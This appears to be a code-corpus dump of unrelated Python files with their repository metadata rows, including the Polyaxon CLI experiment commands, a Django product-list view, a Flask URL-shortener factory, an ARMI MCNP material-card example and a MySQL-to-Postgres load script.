res["default_digits_iterative"] = 0.9156041287188829
res["digits_iterative_n_iter"] = 64
res["default_digits_binary"] = 0.9927140255009107
res["default_digits_multilabel"] = 0.90997912489192
res["default_digits_multilabel_proba"] = 1.0
res['ignore_hps'] = ['max_iter']
sk_mod = sklearn.linear_model.PassiveAggressiveClassifier
module = PassiveAggressive
step_hyperparameter = {
'name': 'max_iter',
'value': module.get_max_iter(),
}
| 30.361111 | 79 | 0.725526 | 123 | 1,093 | 6.105691 | 0.447154 | 0.11984 | 0.106525 | 0.026631 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10989 | 0.167429 | 1,093 | 35 | 80 | 31.228571 | 0.715385 | 0 | 0 | 0 | 0 | 0 | 0.26624 | 0.15279 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.185185 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7c79d2fe84aae88ef213fa559ea2499797887d57
| 959 |
py
|
Python
|
doc/gallery-src/analysis/run_blockMcnpMaterialCard.py
|
celikten/armi
|
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
|
[
"Apache-2.0"
] | 1 |
2021-05-29T16:02:31.000Z
|
2021-05-29T16:02:31.000Z
|
doc/gallery-src/analysis/run_blockMcnpMaterialCard.py
|
celikten/armi
|
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
|
[
"Apache-2.0"
] | null | null | null |
doc/gallery-src/analysis/run_blockMcnpMaterialCard.py
|
celikten/armi
|
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
|
[
"Apache-2.0"
] | null | null | null |
"""
Write MCNP Material Cards
=========================
Here we load a test reactor and write each component of one fuel block out as
MCNP material cards.
Normally, code-specific utility code would belong in a code-specific ARMI
plugin. But in this case, the need for MCNP materials cards is so pervasive
that it made it into the framework.
"""
from armi.reactor.tests import test_reactors
from armi.reactor.flags import Flags
from armi.utils.densityTools import formatMaterialCard
from armi.nucDirectory import nuclideBases as nb
from armi import configure
configure(permissive=True)
_o, r = test_reactors.loadTestReactor()
bFuel = r.core.getBlocks(Flags.FUEL)[0]
for ci, component in enumerate(bFuel, start=1):
ndens = component.getNumberDensities()
# convert nucName (str) keys to nuclideBase keys
ndensByBase = {nb.byName[nucName]: dens for nucName, dens in ndens.items()}
print("".join(formatMaterialCard(ndensByBase, matNum=ci)))
| 31.966667 | 79 | 0.755996 | 136 | 959 | 5.308824 | 0.610294 | 0.055402 | 0.047091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002436 | 0.1439 | 959 | 29 | 80 | 33.068966 | 0.876979 | 0.402503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.416667 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c7e5ef5e8a7277261b9729c9f251391fd2d29dc
| 1,415 |
py
|
Python
|
apps/goods/views_base.py
|
sunwei19910119/DjangoShop
|
188102dc8ef9f4751f4eeeb7574e95c8cc270484
|
[
"MIT"
] | 3 |
2018-08-22T02:41:55.000Z
|
2022-03-03T08:49:38.000Z
|
apps/goods/views_base.py
|
sunwei19910119/DjangoShop
|
188102dc8ef9f4751f4eeeb7574e95c8cc270484
|
[
"MIT"
] | null | null | null |
apps/goods/views_base.py
|
sunwei19910119/DjangoShop
|
188102dc8ef9f4751f4eeeb7574e95c8cc270484
|
[
"MIT"
] | 1 |
2019-10-23T12:24:08.000Z
|
2019-10-23T12:24:08.000Z
|
# encoding: utf-8
from goods.models import Goods
from django.views.generic.base import View
class GoodsListView(View):
def get(self, request):
"""
通过django的view实现商品列表页
"""
json_list = []
goods = Goods.objects.all()[:10]
# for good in goods:
# json_dict = {}
# json_dict["name"] = good.name
# json_dict["category"] = good.category.name
# json_dict["market_price"] = good.market_price
# json_dict["add_time"] = good.add_time
# json_list.append(json_dict)
# from django.http import HttpResponse
# import json
# return HttpResponse(json.dumps(json_list),content_type="application/json")
from django.forms.models import model_to_dict
for good in goods:
json_dict = model_to_dict(good)
json_list.append(json_dict)
import json
from django.core import serializers
json_data = serializers.serialize('json', goods)
json_data = json.loads(json_data)
from django.http import HttpResponse, JsonResponse
# jsonResponse做的工作也就是加上了dumps和content_type
# return HttpResponse(json.dumps(json_data), content_type="application/json")
# 注释掉loads,下面语句正常
# return HttpResponse(json_data, content_type="application/json")
return JsonResponse(json_data, safe=False)
| 32.159091 | 85 | 0.633922 | 159 | 1,415 | 5.45283 | 0.352201 | 0.073818 | 0.076125 | 0.089965 | 0.320646 | 0.129181 | 0 | 0 | 0 | 0 | 0 | 0.002913 | 0.272085 | 1,415 | 43 | 86 | 32.906977 | 0.838835 | 0.424735 | 0 | 0 | 0 | 0 | 0.005175 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c81cc51df1ab53c03a469cdc7c5c3c8cd7e2980
| 508 |
py
|
Python
|
url_shortener/src/__init__.py
|
Andrelpoj/hire.me
|
79428e2094a6b56e762a7f958e1b75f395f59cef
|
[
"Apache-2.0"
] | null | null | null |
url_shortener/src/__init__.py
|
Andrelpoj/hire.me
|
79428e2094a6b56e762a7f958e1b75f395f59cef
|
[
"Apache-2.0"
] | null | null | null |
url_shortener/src/__init__.py
|
Andrelpoj/hire.me
|
79428e2094a6b56e762a7f958e1b75f395f59cef
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask
from .extensions import db
from .routes import short
from . import config
def create_app():
""" Creates Flask App, connect to Database and register Blueprint of routes"""
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = config.DATABASE_CONNECTION_URI
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.app_context().push()
db.init_app(app)
db.create_all()
app.register_blueprint(short)
return app
| 28.222222 | 83 | 0.690945 | 64 | 508 | 5.25 | 0.484375 | 0.10119 | 0.113095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222441 | 508 | 18 | 84 | 28.222222 | 0.850633 | 0.139764 | 0 | 0 | 0 | 0 | 0.128019 | 0.128019 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.461538 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c82fafc5019f5e066e5d9af9ec1a1742645a993
| 27,180 |
py
|
Python
|
polyaxon_cli/cli/experiment.py
|
tiagopms/polyaxon-cli
|
eb13e3b8389ccf069a421a4dabc87aaa506ab61c
|
[
"MIT"
] | null | null | null |
polyaxon_cli/cli/experiment.py
|
tiagopms/polyaxon-cli
|
eb13e3b8389ccf069a421a4dabc87aaa506ab61c
|
[
"MIT"
] | null | null | null |
polyaxon_cli/cli/experiment.py
|
tiagopms/polyaxon-cli
|
eb13e3b8389ccf069a421a4dabc87aaa506ab61c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import sys
import click
import rhea
from polyaxon_cli.cli.getters.experiment import (
get_experiment_job_or_local,
get_project_experiment_or_local
)
from polyaxon_cli.cli.upload import upload
from polyaxon_cli.client import PolyaxonClient
from polyaxon_cli.client.exceptions import PolyaxonHTTPError, PolyaxonShouldExitError
from polyaxon_cli.logger import clean_outputs
from polyaxon_cli.managers.experiment import ExperimentManager
from polyaxon_cli.managers.experiment_job import ExperimentJobManager
from polyaxon_cli.utils import cache
from polyaxon_cli.utils.formatting import (
Printer,
dict_tabulate,
get_meta_response,
get_resources,
list_dicts_to_tabulate
)
from polyaxon_cli.utils.log_handler import get_logs_handler
from polyaxon_cli.utils.validation import validate_tags
from polyaxon_client.exceptions import PolyaxonClientException
def get_experiment_details(experiment): # pylint:disable=redefined-outer-name
if experiment.description:
Printer.print_header("Experiment description:")
click.echo('{}\n'.format(experiment.description))
if experiment.resources:
get_resources(experiment.resources.to_dict(), header="Experiment resources:")
if experiment.declarations:
Printer.print_header("Experiment declarations:")
dict_tabulate(experiment.declarations)
if experiment.last_metric:
Printer.print_header("Experiment last metrics:")
dict_tabulate(experiment.last_metric)
response = experiment.to_light_dict(
humanize_values=True,
exclude_attrs=[
'uuid', 'config', 'project', 'experiments', 'description',
'declarations', 'last_metric', 'resources', 'jobs', 'run_env'
])
Printer.print_header("Experiment info:")
dict_tabulate(Printer.add_status_color(response))
@click.group()
@click.option('--project', '-p', type=str, help="The project name, e.g. 'mnist' or 'adam/mnist'.")
@click.option('--experiment', '-xp', type=int, help="The experiment id number.")
@click.pass_context
@clean_outputs
def experiment(ctx, project, experiment): # pylint:disable=redefined-outer-name
"""Commands for experiments."""
ctx.obj = ctx.obj or {}
ctx.obj['project'] = project
ctx.obj['experiment'] = experiment
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.pass_context
@clean_outputs
def get(ctx, job):
"""Get experiment or experiment job.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples for getting an experiment:
\b
```bash
$ polyaxon experiment get # if experiment is cached
```
\b
```bash
$ polyaxon experiment --experiment=1 get
```
\b
```bash
$ polyaxon experiment -xp 1 --project=cats-vs-dogs get
```
\b
```bash
$ polyaxon experiment -xp 1 -p alain/cats-vs-dogs get
```
Examples for getting an experiment job:
\b
```bash
$ polyaxon experiment get -j 1 # if experiment is cached
```
\b
```bash
$ polyaxon experiment --experiment=1 get --job=10
```
\b
```bash
$ polyaxon experiment -xp 1 --project=cats-vs-dogs get -j 2
```
\b
```bash
$ polyaxon experiment -xp 1 -p alain/cats-vs-dogs get -j 2
```
"""
def get_experiment():
try:
response = PolyaxonClient().experiment.get_experiment(user, project_name, _experiment)
cache.cache(config_manager=ExperimentManager, response=response)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not load experiment `{}` info.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
get_experiment_details(response)
def get_experiment_job():
try:
response = PolyaxonClient().experiment_job.get_job(user,
project_name,
_experiment,
_job)
cache.cache(config_manager=ExperimentJobManager, response=response)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get job `{}`.'.format(_job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
if response.resources:
get_resources(response.resources.to_dict(), header="Job resources:")
response = Printer.add_status_color(response.to_light_dict(
humanize_values=True,
exclude_attrs=['uuid', 'definition', 'experiment', 'unique_name', 'resources']
))
Printer.print_header("Job info:")
dict_tabulate(response)
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job()
else:
get_experiment()
@experiment.command()
@click.pass_context
@clean_outputs
def delete(ctx):
"""Delete experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Example:
\b
```bash
$ polyaxon experiment delete
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if not click.confirm("Are sure you want to delete experiment `{}`".format(_experiment)):
click.echo('Existing without deleting experiment.')
sys.exit(1)
try:
response = PolyaxonClient().experiment.delete_experiment(
user, project_name, _experiment)
# Purge caching
ExperimentManager.purge()
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not delete experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
if response.status_code == 204:
Printer.print_success("Experiment `{}` was delete successfully".format(_experiment))
@experiment.command()
@click.option('--name', type=str,
help='Name of the experiment, must be unique within the project, could be none.')
@click.option('--description', type=str, help='Description of the experiment.')
@click.option('--tags', type=str, help='Tags of the experiment, comma separated values.')
@click.pass_context
@clean_outputs
def update(ctx, name, description, tags):
"""Update experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment -xp 2 update --description="new description for my experiments"
```
\b
```bash
$ polyaxon experiment -xp 2 update --tags="foo, bar" --name="unique-name"
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
update_dict = {}
if name:
update_dict['name'] = name
if description:
update_dict['description'] = description
tags = validate_tags(tags)
if tags:
update_dict['tags'] = tags
if not update_dict:
Printer.print_warning('No argument was provided to update the experiment.')
sys.exit(0)
try:
response = PolyaxonClient().experiment.update_experiment(
user, project_name, _experiment, update_dict)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not update experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment updated.")
get_experiment_details(response)
@experiment.command()
@click.option('--yes', '-y', is_flag=True, default=False,
help="Automatic yes to prompts. "
"Assume \"yes\" as answer to all prompts and run non-interactively.")
@click.pass_context
@clean_outputs
def stop(ctx, yes):
"""Stop experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment stop
```
\b
```bash
$ polyaxon experiment -xp 2 stop
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if not yes and not click.confirm("Are sure you want to stop "
"experiment `{}`".format(_experiment)):
click.echo('Existing without stopping experiment.')
sys.exit(0)
try:
PolyaxonClient().experiment.stop(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not stop experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment is being stopped.")
@experiment.command()
@click.option('--copy', '-c', is_flag=True, default=False,
help="To copy the experiment before restarting.")
@click.option('--file', '-f', multiple=True, type=click.Path(exists=True),
help="The polyaxon files to update with.")
@click.option('-u', is_flag=True, default=False,
help="To upload the repo before restarting.")
@click.pass_context
@clean_outputs
def restart(ctx, copy, file, u): # pylint:disable=redefined-builtin
"""Restart experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment --experiment=1 restart
```
"""
config = None
update_code = None
if file:
config = rhea.read(file)
# Check if we need to upload
if u:
ctx.invoke(upload, sync=False)
update_code = True
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
if copy:
response = PolyaxonClient().experiment.copy(
user, project_name, _experiment, config=config, update_code=update_code)
Printer.print_success('Experiment was copied with id {}'.format(response.id))
else:
response = PolyaxonClient().experiment.restart(
user, project_name, _experiment, config=config, update_code=update_code)
Printer.print_success('Experiment was restarted with id {}'.format(response.id))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not restart experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
@experiment.command()
@click.option('--file', '-f', multiple=True, type=click.Path(exists=True),
help="The polyaxon files to update with.")
@click.option('-u', is_flag=True, default=False,
help="To upload the repo before resuming.")
@click.pass_context
@clean_outputs
def resume(ctx, file, u): # pylint:disable=redefined-builtin
"""Resume experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment --experiment=1 resume
```
"""
config = None
update_code = None
if file:
config = rhea.read(file)
# Check if we need to upload
if u:
ctx.invoke(upload, sync=False)
update_code = True
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
response = PolyaxonClient().experiment.resume(
user, project_name, _experiment, config=config, update_code=update_code)
Printer.print_success('Experiment was resumed with id {}'.format(response.id))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not resume experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
@experiment.command()
@click.option('--page', type=int, help="To paginate through the list of jobs.")
@click.pass_context
@clean_outputs
def jobs(ctx, page):
"""List jobs for experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment --experiment=1 jobs
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
page = page or 1
try:
response = PolyaxonClient().experiment.list_jobs(
user, project_name, _experiment, page=page)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get jobs for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
meta = get_meta_response(response)
if meta:
Printer.print_header('Jobs for experiment `{}`.'.format(_experiment))
Printer.print_header('Navigation:')
dict_tabulate(meta)
else:
Printer.print_header('No jobs found for experiment `{}`.'.format(_experiment))
objects = [Printer.add_status_color(o.to_light_dict(humanize_values=True))
for o in response['results']]
objects = list_dicts_to_tabulate(objects)
if objects:
Printer.print_header("Jobs:")
objects.pop('experiment', None)
dict_tabulate(objects, is_list_dict=True)
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.option('--page', type=int, help="To paginate through the list of statuses.")
@click.pass_context
@clean_outputs
def statuses(ctx, job, page):
"""Get experiment or experiment job statuses.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples getting experiment statuses:
\b
```bash
$ polyaxon experiment statuses
```
\b
```bash
$ polyaxon experiment -xp 1 statuses
```
Examples getting experiment job statuses:
\b
```bash
$ polyaxon experiment statuses -j 3
```
\b
```bash
$ polyaxon experiment -xp 1 statuses --job 1
```
"""
def get_experiment_statuses():
try:
response = PolyaxonClient().experiment.get_statuses(
user, project_name, _experiment, page=page)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could get status for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
meta = get_meta_response(response)
if meta:
Printer.print_header('Statuses for experiment `{}`.'.format(_experiment))
Printer.print_header('Navigation:')
dict_tabulate(meta)
else:
Printer.print_header('No statuses found for experiment `{}`.'.format(_experiment))
objects = list_dicts_to_tabulate(
[Printer.add_status_color(o.to_light_dict(humanize_values=True), status_key='status')
for o in response['results']])
if objects:
Printer.print_header("Statuses:")
objects.pop('experiment', None)
dict_tabulate(objects, is_list_dict=True)
def get_experiment_job_statuses():
try:
response = PolyaxonClient().experiment_job.get_statuses(user,
project_name,
_experiment,
_job,
page=page)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get status for job `{}`.'.format(job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
meta = get_meta_response(response)
if meta:
Printer.print_header('Statuses for Job `{}`.'.format(_job))
Printer.print_header('Navigation:')
dict_tabulate(meta)
else:
Printer.print_header('No statuses found for job `{}`.'.format(_job))
objects = list_dicts_to_tabulate(
[Printer.add_status_color(o.to_light_dict(humanize_values=True), status_key='status')
for o in response['results']])
if objects:
Printer.print_header("Statuses:")
objects.pop('job', None)
dict_tabulate(objects, is_list_dict=True)
page = page or 1
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job_statuses()
else:
get_experiment_statuses()
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.option('--gpu', '-g', is_flag=True, help="List experiment GPU resources.")
@click.pass_context
@clean_outputs
def resources(ctx, job, gpu):
"""Get experiment or experiment job resources.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples for getting experiment resources:
\b
```bash
$ polyaxon experiment -xp 19 resources
```
For GPU resources
\b
```bash
$ polyaxon experiment -xp 19 resources --gpu
```
Examples for getting experiment job resources:
\b
```bash
$ polyaxon experiment -xp 19 resources -j 1
```
For GPU resources
\b
```bash
$ polyaxon experiment -xp 19 resources -j 1 --gpu
```
"""
def get_experiment_resources():
try:
message_handler = Printer.gpu_resources if gpu else Printer.resources
PolyaxonClient().experiment.resources(
user, project_name, _experiment, message_handler=message_handler)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get resources for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
def get_experiment_job_resources():
try:
message_handler = Printer.gpu_resources if gpu else Printer.resources
PolyaxonClient().experiment_job.resources(user,
project_name,
_experiment,
_job,
message_handler=message_handler)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get resources for job `{}`.'.format(_job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job_resources()
else:
get_experiment_resources()
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.option('--past', '-p', is_flag=True, help="Show the past logs.")
@click.option('--follow', '-f', is_flag=True, default=False,
help="Stream logs after showing past logs.")
@click.option('--hide_time', is_flag=True, default=False,
help="Whether or not to hide timestamps from the log stream.")
@click.pass_context
@clean_outputs
def logs(ctx, job, past, follow, hide_time):
"""Get experiment or experiment job logs.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples for getting experiment logs:
\b
```bash
$ polyaxon experiment logs
```
\b
```bash
$ polyaxon experiment -xp 10 -p mnist logs
```
Examples for getting experiment job logs:
\b
```bash
$ polyaxon experiment -xp 1 -j 1 logs
```
"""
def get_experiment_logs():
if past:
try:
response = PolyaxonClient().experiment.logs(
user, project_name, _experiment, stream=False)
get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time,
stream=False)(response.content.decode().split('\n'))
print()
if not follow:
return
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
if not follow:
Printer.print_error(
'Could not get logs for experiment `{}`.'.format(_experiment))
Printer.print_error(
'Error message `{}`.'.format(e))
sys.exit(1)
try:
PolyaxonClient().experiment.logs(
user,
project_name,
_experiment,
message_handler=get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get logs for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
def get_experiment_job_logs():
if past:
try:
response = PolyaxonClient().experiment_job.logs(
user,
project_name,
_experiment,
_job,
stream=False)
get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time,
stream=False)(response.content.decode().split('\n'))
print()
if not follow:
return
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
if not follow:
Printer.print_error(
'Could not get logs for experiment `{}`.'.format(_experiment))
Printer.print_error(
'Error message `{}`.'.format(e))
sys.exit(1)
try:
PolyaxonClient().experiment_job.logs(
user,
project_name,
_experiment,
_job,
message_handler=get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get logs for job `{}`.'.format(_job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job_logs()
else:
get_experiment_logs()
@experiment.command()
@click.pass_context
@clean_outputs
def outputs(ctx):
"""Download outputs for experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment -xp 1 outputs
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
PolyaxonClient().experiment.download_outputs(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not download outputs for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success('Files downloaded.')
@experiment.command()
@click.pass_context
@clean_outputs
def bookmark(ctx):
"""Bookmark experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment bookmark
```
\b
```bash
$ polyaxon experiment -xp 2 bookmark
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
PolyaxonClient().experiment.bookmark(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not bookmark experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment is bookmarked.")
@experiment.command()
@click.pass_context
@clean_outputs
def unbookmark(ctx):
"""Unbookmark experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment unbookmark
```
\b
```bash
$ polyaxon experiment -xp 2 unbookmark
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
PolyaxonClient().experiment.unbookmark(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not unbookmark experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment is unbookmarked.")
| 33.84807 | 99 | 0.606659 | 2,827 | 27,180 | 5.659356 | 0.089848 | 0.048753 | 0.040378 | 0.051566 | 0.768986 | 0.705607 | 0.636852 | 0.606163 | 0.585349 | 0.570286 | 0 | 0.003379 | 0.281347 | 27,180 | 802 | 100 | 33.890274 | 0.815697 | 0.134106 | 0 | 0.587473 | 0 | 0 | 0.14221 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049676 | false | 0.030238 | 0.034557 | 0 | 0.088553 | 0.146868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c88b8dca0946deb62b53070c85ee8a8bd47974e
| 845 |
py
|
Python
|
initial_load.py
|
hongyuanChrisLi/RealEstateDBConvert
|
0fd04f5213ff3fd3548db3f322828bd80cf41791
|
[
"Apache-2.0"
] | null | null | null |
initial_load.py
|
hongyuanChrisLi/RealEstateDBConvert
|
0fd04f5213ff3fd3548db3f322828bd80cf41791
|
[
"Apache-2.0"
] | null | null | null |
initial_load.py
|
hongyuanChrisLi/RealEstateDBConvert
|
0fd04f5213ff3fd3548db3f322828bd80cf41791
|
[
"Apache-2.0"
] | null | null | null |
from mysql_dao.select_dao import SelectDao as MysqlSelectDao
from postgres_dao.ddl_dao import DdlDao
from postgres_dao.dml_dao import DmlDao as PsqlDmlDao
psql_ddl_dao = DdlDao()
mysql_select_dao = MysqlSelectDao()
psql_dml_dao = PsqlDmlDao()
psql_ddl_dao.create_tables()
county_data = mysql_select_dao.select_all_counties()
psql_dml_dao.insert_county(county_data)
city_data = mysql_select_dao.select_all_cities()
psql_dml_dao.insert_city(city_data)
zipcode_data = mysql_select_dao.select_all_zipcodes()
psql_dml_dao.insert_zipcode(zipcode_data)
data = mysql_select_dao.select_full_addr_month_rpt()
psql_dml_dao.trunc_addr_month_rpt()
psql_dml_dao.insert_addr_month_rpt(data)
data = mysql_select_dao.select_full_mls_daily_rpt()
psql_dml_dao.trunc_mls_rpt()
psql_dml_dao.insert_mls_rpt(data)
mysql_select_dao.close()
psql_dml_dao.close()
| 28.166667 | 60 | 0.857988 | 141 | 845 | 4.602837 | 0.241135 | 0.09245 | 0.138675 | 0.16641 | 0.365177 | 0.291217 | 0.098613 | 0 | 0 | 0 | 0 | 0 | 0.068639 | 845 | 29 | 61 | 29.137931 | 0.824651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c8e9965cc893f149c68d0938c7cdd288fb5e3a7
| 980 |
py
|
Python
|
